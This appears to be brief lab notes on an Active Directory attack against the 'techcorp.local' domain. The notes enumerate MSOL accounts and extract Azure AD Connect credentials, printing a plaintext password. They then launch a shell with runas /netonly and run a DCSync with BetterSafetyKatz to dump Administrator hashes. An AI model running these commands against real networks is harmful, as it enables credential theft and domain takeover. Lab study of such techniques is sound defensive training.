Enumerating The User

Get-DomainUser -Identity "MSOL_*" -Domain techcorp.local

Running ADConnect on the us-adconnect server

ADConnect

we got the user MSOL

Domain: techcorp.local
Username: MSOL_16fb75d0227d
Password: 70&n1{p!Mb7K.C)/USO.a{@m*%.+^230@KAc[+sr}iF>Xv{1!{=/}}3B.T8IW-{)^Wj^zbyOc=Ahi]n=S7K$wAr;sOlb7IFh}!%J.o0}?zQ8]fp&.5w+!!IaRSD@qYf

Running Process As user

runas.exe /user:techcorp.local\\MSOL_16fb75d0227d /netonly cmd

Now Performing DCSync

.\\BetterSafetyKatz.exe "lsadump::dcsync /user:techcorp\\Administrator /domain:techcorp.local"

And we got the hashes